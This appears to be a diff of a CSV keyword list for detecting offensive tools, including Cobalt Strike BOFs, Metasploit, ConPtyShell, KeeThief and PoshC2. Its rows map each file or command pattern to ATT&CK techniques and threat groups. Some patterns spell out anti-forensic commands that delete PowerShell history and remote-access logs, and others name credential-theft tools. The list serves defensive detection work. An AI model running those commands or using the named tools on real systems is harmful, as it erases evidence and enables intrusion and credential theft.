-"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*remote-exec *jump *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteHashRetrieval.ps1*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" -"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" 
+"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
+"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
 "*RemoteNTDLL.cpp*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
 "*RemoteNTDLL.exe*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
 "*remotereg.cna*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
 "*RemoteScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","",""
-"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Remove_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
-"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
 "*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Remove-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
-"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
